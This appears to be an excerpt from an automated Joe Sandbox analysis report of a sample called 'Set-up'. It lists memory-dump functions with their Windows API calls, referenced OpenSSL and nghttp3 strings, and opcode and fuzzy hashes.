                                    • Opcode Fuzzy Hash: b4aaf3ad7b1b96075f7d8f26d60089a72f62c1d3169d5e467eccfd75c90fd34f
                                    • Instruction Fuzzy Hash: 09A19070B007039BDB209F76E985B22B7E8BF05748F08413DE969CB681FB75E9108B94
                                    APIs
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 00E0E9A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: $BN_lshift$crypto/bn/bn_shift.c
                                    • API String ID: 2221118986-2228461501
                                    • Opcode ID: 6b98c5c9fc80c3840168102104d87baab222adeeb54e81cd653cfddaab48aba2
                                    • Instruction ID: 260fddf92f8d86390220513fc88de7bbf7034ba901935be91560895d291f24ab
                                    • Opcode Fuzzy Hash: 6b98c5c9fc80c3840168102104d87baab222adeeb54e81cd653cfddaab48aba2
                                    • Instruction Fuzzy Hash: EC71CD71A087149BC725DF29C88062AF7A1EFDA710F488B2EF9A977391D770AC41CB41
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00E305BF,00000000,00000000,input), ref: 00E84986
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 00E849D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpystrlen
                                    • String ID: crypto/property/property_string.c$ossl_property_string
                                    • API String ID: 3412268980-3682758481
                                    • Opcode ID: 01b81997c62bc2485efe84116ffe34c75ba42bdc0405a12ed9560a2873bd6691
                                    • Instruction ID: 88764d07007f225b9e88807ea32333a4976976930edd917c7e21a118f1386055
                                    • Opcode Fuzzy Hash: 01b81997c62bc2485efe84116ffe34c75ba42bdc0405a12ed9560a2873bd6691
                                    • Instruction Fuzzy Hash: D951E7F6D443066BE6217A64BC03F5B7AD89F54748F041438FD8CB6293FA61EA24C792
                                    APIs
                                    • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00E7662C
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strcpystrlen$memcmp
                                    • String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
                                    • API String ID: 1653033214-3047229099
                                    • Opcode ID: 277fad2c2f68b493c40cdf0537fdbcff760dfd9be41f38d1e301f5eadd1ec3d7
                                    • Instruction ID: a508be3da53084c657b4783703702800b54d615b6ce999fcf1b85765d8fabce5
                                    • Opcode Fuzzy Hash: 277fad2c2f68b493c40cdf0537fdbcff760dfd9be41f38d1e301f5eadd1ec3d7
                                    • Instruction Fuzzy Hash: A54116E5A4470577EA2036B12C8BF9B39888F5538CF146535FE0DB92C3F961DA14C2A7
                                    APIs
                                    • EnterCriticalSection.KERNEL32(?), ref: 00D48769
                                    • SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 00D487D1
                                      • Part of subcall function 00D488B0: QueryPerformanceFrequency.KERNEL32(?), ref: 00D488C1
                                      • Part of subcall function 00D488B0: QueryPerformanceCounter.KERNEL32(?), ref: 00D488CC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
                                    • String ID:
                                    • API String ID: 3112449238-0
                                    • Opcode ID: 43ecd7b3e1ec649ff281b7d99dae5bbd8302a6953d1981bc6e175596d49b0a2c
                                    • Instruction ID: fd9d752f8820281a524ae725c6d354b4e99e1bd14959e845c57d2bb0bea8866e
                                    • Opcode Fuzzy Hash: 43ecd7b3e1ec649ff281b7d99dae5bbd8302a6953d1981bc6e175596d49b0a2c
                                    • Instruction Fuzzy Hash: 6A31A5B6B00205ABEB049A25EC85B6F776CFB80390F584538EC56D7191EF31ED14A7B1
                                    APIs
                                    • GetLastError.KERNEL32(00E37CCC,?,00000000,00E37127,00E37CCC,00000000,00E5CAB7,00C81A70), ref: 00E360E3
                                    • SetLastError.KERNEL32(00000000), ref: 00E361A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID: crypto/err/err.c$crypto/err/err_local.h
                                    • API String ID: 1452528299-2963546075
                                    • Opcode ID: 17446af903c6ab82f1bc3c758d6cf27cc4e92e485d67562b4dd3b80bb15df9cb
                                    • Instruction ID: 4ff4edee42f8fe8ae2187ccc0e747581a54ce2b36011d2a89e67141b0d6d8583
                                    • Opcode Fuzzy Hash: 17446af903c6ab82f1bc3c758d6cf27cc4e92e485d67562b4dd3b80bb15df9cb
                                    • Instruction Fuzzy Hash: CD312BB46803037BE6211E397C1BF667B84AB4470DF145234FD14752EBE7B5A838CA95
                                    APIs
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008,?,00000008,?,?,?,?,?,?,?,00EA066D,?,?,?), ref: 00E10AAD
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strcpystrlen$memset
                                    • String ID: BUF_MEM_grow_clean$crypto/buffer/buffer.c
                                    • API String ID: 2970985887-4138242688
                                    • Opcode ID: b272cfc71ea0a67ea52c55bc3dfab5aa91cb126737a3701be7b9ba7766d1d0d8
                                    • Instruction ID: f532060322efc2b06a23a03d8c096120a28652dc895bba74950278fa957da3e7
                                    • Opcode Fuzzy Hash: b272cfc71ea0a67ea52c55bc3dfab5aa91cb126737a3701be7b9ba7766d1d0d8
                                    • Instruction Fuzzy Hash: 2B31FD71754305ABDB10AE24DC87FAA7BD89F81714F088519FC89BB2C6E6B4D8C48661
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,00DF71DD,00000000,?,?), ref: 00DF44AC
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 00DF44FF
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen$strcpy$memcpy
                                    • String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
                                    • API String ID: 1223016426-1431402185
                                    • Opcode ID: f5fb37e9bdbeca803d2297bd5c270fac48b84a38efe8dd2698ca68c44715ac9e
                                    • Instruction ID: 55d0c09560501340a413732fd5e7ec7ae20486dac74303719668e1f9ad7dc6ca
                                    • Opcode Fuzzy Hash: f5fb37e9bdbeca803d2297bd5c270fac48b84a38efe8dd2698ca68c44715ac9e
                                    • Instruction Fuzzy Hash: BD110BB1A043196BD7216D649885B7777D89F91710F1A8129FF557B382EAB0DC04C2F1
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 00D2C4E7
                                    Strings
                                    • nghttp3_qpack.c, xrefs: 00D2C4DD
                                    • (size_t)(p - pbuf->last) == len, xrefs: 00D2C4E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
                                    • API String ID: 1222420520-3384106985
                                    • Opcode ID: 49f17f7b4ff40d42e1c7015810666a403a5310d34e0150de0c29e438499b5717
                                    • Instruction ID: d2738976d887ae5aefa3a64952e6995f63b94a420f8ea3b293941b903bdee830
                                    • Opcode Fuzzy Hash: 49f17f7b4ff40d42e1c7015810666a403a5310d34e0150de0c29e438499b5717
                                    • Instruction Fuzzy Hash: 7681F671A183109FD704DE2CD89072EB7D2EFA9318F189A7CE8998B3D2D635DC498791
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cca133013a116d53a448ff934384644f151ccf1b99d6f45ce66b1454f5bfae0f
                                    • Instruction ID: bc795f832ab52ae7dc6043c60c435cf2df530e8dcf8f8d5206f1218eba75b885
                                    • Opcode Fuzzy Hash: cca133013a116d53a448ff934384644f151ccf1b99d6f45ce66b1454f5bfae0f
                                    • Instruction Fuzzy Hash: 56D1AEB2508305BFD700AF58DC81E6BBBE9EBC4344F59492CF94563252E631ED54CBA2
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,00D2B434,?,?,00000000,00000000,?,?), ref: 00D2C68A
                                    Strings
                                    • nghttp3_qpack.c, xrefs: 00D2C680
                                    • (size_t)(p - rbuf->last) == len, xrefs: 00D2C685
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assert
                                    • String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
                                    • API String ID: 1222420520-2159148421
                                    • Opcode ID: 9db7ca6bb58161bcad6a49ea4c89d1da9caa87c83f4123d2607db9ff3e27a84e
                                    • Instruction ID: 1836e2726ab1ca0cf31793c137c6761eea8b671c6be7329627c6b72be1fe269e
                                    • Opcode Fuzzy Hash: 9db7ca6bb58161bcad6a49ea4c89d1da9caa87c83f4123d2607db9ff3e27a84e
                                    • Instruction Fuzzy Hash: 8B4116717193104FD7099A2CE89076EB7D2EFE9318F18867CE889CB392D935DD0587A1
                                    APIs
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00D327D1
                                    Strings
                                    • nghttp3_qpack.c, xrefs: 00D327C7
                                    • nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 00D327CC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
